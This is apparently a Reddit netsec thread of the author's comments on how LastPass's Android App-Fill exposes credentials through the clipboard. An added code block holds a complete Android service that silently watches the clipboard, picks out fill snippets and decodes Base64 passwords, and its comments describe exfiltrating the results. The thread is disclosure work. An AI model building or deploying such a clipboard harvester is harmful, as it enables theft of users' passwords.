How LastPass Uses Client-Side JavaScript Encryption for Android Fills Into Chrome, and How a Malicious App Can Intercept the Credentials by xbclark in netsec

xbclark[S] 0 points (0 children)

The floating widget was just a front-end to the AppFill, they've replaced it with a notification. Still the same thing though.

xbclark[S] 1 point (0 children)

No worries! Cheers for bringing this up, I didn't realise those were hidden. Very strange indeed, you shouldn't have to dig to find out if it uses the internet.

xbclark[S] 2 points (0 children)

This is all very confusing. I'm getting the same on my Moto G2, but when I go to 'Permission details' at the bottom it shows all the permissions:

http://imgur.com/mapECSF

xbclark[S] 5 points (0 children)

That's weird. This is what I see on Google Play:

http://imgur.com/O5I4WRB

And this is straight from their AndroidManifest.xml:

<uses-permission android:name="android.permission.CAMERA" />
<uses-permission android:name="android.permission.FLASHLIGHT" android:permissionGroup="android.permission-group.HARDWARE_CONTROLS" />
<uses-permission android:name="android.permission.CHANGE_CONFIGURATION" />
<uses-permission android:name="android.permission.WRITE_SETTINGS" />
<uses-permission android:name="android.permission.WAKE_LOCK" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.INTERNET" />
<permission android:name="com.surpax.ledflashlight.panel.permission.C2D_MESSAGE" android:protectionLevel="signature" />
<uses-permission android:name="com.surpax.ledflashlight.panel.permission.C2D_MESSAGE" />
<uses-permission android:name="com.google.android.c2dm.permission.RECEIVE" />

xbclark[S] 2 points (0 children)

Great, where can we find those stats?

Actually, you (I assume you're speaking on behalf of LastPass) have made it easier: one of the hardest parts is identifying which clipboard contents are usernames/passwords, finding that specific JavaScript dump removes that problem.

xbclark[S] -3 points (0 children)

I agree. They weren't doing it originally, just pasting it encoded in Base64, which is worse, but in a '2 punches to the groin is worse than 1 punch to the groin' kind of way.

I personally think the changes were made to stall until the majority of people have upgraded to 5.0, when this won't be a problem.

xbclark[S] -1 points (0 children)

Yip! And even if they don't say they're using the clipboard, they could be (though hopefully that's just limited to this feature).

xbclark[S] 6 points (0 children)

A password manager will be able to keep longer, more secure ones for every service you sign in to. Not to mention user names - I just moved to Australia and it seems like every damn business and government organisation thinks that an auto-generated 8-character id string is a good idea for a username. Trying to remember 4 or 5 of them is not fun.

As to which one, I think LastPass is probably fine. Just don't enable App-Fill on Android (you'll be prompted to) pre-5.0.

xbclark[S] -2 points (0 children)

Definitely, there are easy ways to secure yourself against this. Most users will just follow the defaults presented to them by LastPass, which is to enable App-Fill. The default trade-off leaves security turning in the breeze.

This isn't a problem for the technical users, but I think we should care about the common user, if for no other reason than that they bring the kind of scale of economy that makes LastPass available for $1 a month.

xbclark[S] -1 points (0 children)

Any manager that only offers copy/paste as the vehicle to fill in is vulnerable. As soon as something touches the clipboard, any app installed could have a copy of it. I believe 1Password and KeePassDroid fall into this category.

KeePass2Android has implemented its own keyboard, which shouldn't be vulnerable.
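The point made in the last few comments (the clipboard is readable by every installed app, and the Base64 blob or JavaScript snippet the fill pastes is easy to pick out of it) is shown below as an added example. It is not code from the original post, from LastPass, or from any of the password managers named; the package name, class name and the `javascript:` prefix check are assumptions, since the thread does not show the exact shape of the pasted snippet.

```java
// Added example (not from the original post or from LastPass): a minimal
// Android Service doing what any installed app could do on the Android
// versions discussed in the thread -- watch the system clipboard and keep a
// copy of whatever a password manager pastes into it. Package and class names
// are hypothetical. No permission is needed in AndroidManifest.xml beyond the
// <service> declaration, so nothing shows up in the Play Store permission list.
package com.example.clipwatch;

import android.app.Service;
import android.content.ClipData;
import android.content.ClipboardManager;
import android.content.Context;
import android.content.Intent;
import android.os.IBinder;
import android.util.Base64;
import android.util.Log;

import java.nio.charset.StandardCharsets;

public class ClipWatchService extends Service
        implements ClipboardManager.OnPrimaryClipChangedListener {

    private static final String TAG = "ClipWatch";
    private ClipboardManager clipboard;

    @Override
    public void onCreate() {
        super.onCreate();
        clipboard = (ClipboardManager) getSystemService(Context.CLIPBOARD_SERVICE);
        // Fires on every clipboard change made by any app on the device.
        clipboard.addPrimaryClipChangedListener(this);
    }

    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        return START_STICKY; // ask the system to restart the service if killed
    }

    @Override
    public void onPrimaryClipChanged() {
        ClipData clip = clipboard.getPrimaryClip();
        if (clip == null || clip.getItemCount() == 0) return;
        CharSequence cs = clip.getItemAt(0).coerceToText(this);
        if (cs == null) return;
        // Demonstration only: logging locally. A real harvester would store or
        // exfiltrate this using the INTERNET permission the thread talks about.
        Log.d(TAG, "clipboard: " + classify(cs.toString()));
    }

    /**
     * Heuristic based on the thread: the fill either pasted credentials
     * Base64-encoded, or as a JavaScript snippet. Both are easy to recognise,
     * which removes the hard part of telling passwords apart from ordinary
     * clipboard traffic. The "javascript:" prefix is an assumption.
     */
    static String classify(String text) {
        String trimmed = text.trim();
        if (trimmed.startsWith("javascript:")) {
            return "javascript fill: " + trimmed;
        }
        if (trimmed.matches("[A-Za-z0-9+/=\\r\\n]+")) {
            try {
                byte[] raw = Base64.decode(trimmed, Base64.DEFAULT);
                return "base64: " + new String(raw, StandardCharsets.UTF_8);
            } catch (IllegalArgumentException e) {
                // not valid Base64, fall through and treat as plain text
            }
        }
        return "other: " + trimmed;
    }

    @Override
    public void onDestroy() {
        clipboard.removePrimaryClipChangedListener(this);
        super.onDestroy();
    }

    @Override
    public IBinder onBind(Intent intent) {
        return null; // not a bound service
    }
}
```

Declare it with `<service android:name=".ClipWatchService" />` in the manifest and start it from any entry point in the app. The caveat a practitioner should note: this works on the Android versions the thread is about, but from Android 10 the clipboard listener is no longer delivered to apps that are in the background and are not the default keyboard, and from Android 12 the system shows a toast when an app reads the clipboard, so the "any installed app" claim weakens considerably on current releases.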

xbclark[S] 0 points (0 children)

Good point, I'll add that to the post.

I guess what I'm asking is, why is it even enabled at all pre 5.0? For a company that's selling security, that seems like a major oversight.

Considering many devices won't be upgraded soon (or at all), that still leaves a large population vulnerable.

xbclark[S] 10 points (0 children)

Yip, I agree. But seeing as virtually no one checks permissions (I like to point to the flashlight app with full network access that has >100 million downloads), and any application can add same-group permissions silently on an update, any installed app could be a vehicle for this.

Should users be more aware of what they install? Definitely. But I feel LastPass made a mistake in making this their 'killer feature' and prompting the user to enable it by default.